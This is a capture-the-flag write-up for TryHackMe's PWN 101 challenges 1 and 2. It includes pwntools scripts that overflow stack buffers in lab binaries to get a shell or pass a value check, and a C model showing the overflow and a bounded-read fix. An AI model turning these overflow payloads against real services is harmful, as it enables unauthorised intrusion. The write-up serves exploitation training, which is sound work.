# PWN 101

https://tryhackme.com/room/pwn101
## Challenge 1

First, I tried running the binary locally to see what it needs.

Then let's check the binary and see what is in it. I used Ghidra.

We can see in the code that this is just a matter of an overflow: the array bound is not checked, so we just need to overflow local_48 with 60 or more bytes of data to get an sh shell.
#### SOLUTION
```
#!/usr/bin/env python3
# @barcrange
# pip install pwntools
from pwn import *

# python file.py REMOTE
if args.REMOTE:
    p = remote("xx.xx.xx.xx", 9001)
# python file.py LOCAL
if args.LOCAL:
    p = process("./pwn101.pwn101")

# 60 filler bytes written into local_48
payload = b""
payload += b"A"*60
p.sendlineafter(b"Type the required ingredients to make briyani: ", payload)
p.interactive()
```
Let's check locally whether it gives an sh shell.

Now that it works locally, let's run it against the remote and grab the flag.

## Challenge 2

First, I tried running the binary locally to see what it needs.

Then let's check the binary and see what is in it. I used Ghidra.

In this one we can see that we have to overflow 104 characters from local_78. Then, on line 15, we can see that we need to add the values that get us past `if ((local_c == 0xc0ff33) && (local_10 == 0xc0d3))`.
#### SOLUTION
```
#!/usr/bin/env python3
# @barcrange
# pip install pwntools
from pwn import *

# python file.py REMOTE
if args.REMOTE:
    p = remote("xx.xx.xx.xx", 9002)
# python file.py LOCAL
if args.LOCAL:
    p = process("./pwn102.pwn102")

# 104 filler bytes for local_78, then the two values the check compares
payload = b""
payload += b"A"*104
payload += p32(0xc0d3)    # lands in local_10
payload += p32(0xc0ff33)  # lands in local_c
print("Payload used is :")
print(payload)
p.sendlineafter(b"Am I right? ", payload)
p.interactive()
```
Let's check locally whether it gives an sh shell.

Now that it works locally, let's run it against the remote and grab the flag.
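
Why 104 bytes, and why the values go in that order: Ghidra names stack locals by their hex stack offset, so local_78 to local_10 is 0x78 - 0x10 = 104 bytes, with local_10 and then local_c directly after the buffer. The C model below is an added example, not the challenge's source or the author's code; the `struct frame` layout and all function names are assumptions, and it runs the same input through an unbounded read and a length-capped one.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame model taken from the Ghidra names: the buffer spans
   0x78 - 0x10 = 104 bytes and the two checked ints follow it. */
struct frame {
    char     local_78[104];
    uint32_t local_10;
    uint32_t local_c;
};

/* The comparison quoted from the decompiler output. */
static int check(const struct frame *f) {
    return f->local_c == 0xc0ff33 && f->local_10 == 0xc0d3;
}

/* Same bytes as the page's payload: 104 filler bytes, then both values
   in host byte order (what p32 produces on little-endian x86-64). */
size_t build_input(unsigned char *out) {
    uint32_t v10 = 0xc0d3, vc = 0xc0ff33;
    memset(out, 'A', 104);
    memcpy(out + 104, &v10, sizeof v10);
    memcpy(out + 108, &vc, sizeof vc);
    return 112;
}

/* Read with no length limit, modelled by copying across the whole frame. */
int unbounded_read(const unsigned char *in, size_t n) {
    struct frame f = {0};
    memcpy(&f, in, n < sizeof f ? n : sizeof f);
    return check(&f);
}

/* Hardened form: the copy is capped at the buffer size, NUL included. */
int bounded_read(const unsigned char *in, size_t n) {
    struct frame f = {0};
    size_t cap = sizeof f.local_78 - 1;
    memcpy(f.local_78, in, n < cap ? n : cap);
    return check(&f);
}

int main(void) {
    unsigned char in[112];
    size_t n = build_input(in);
    printf("unbounded=%d bounded=%d\n", unbounded_read(in, n), bounded_read(in, n));
    return 0;
}
```

With the length cap in place the neighbouring variables keep their original values, so the comparison can no longer be influenced by the input.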
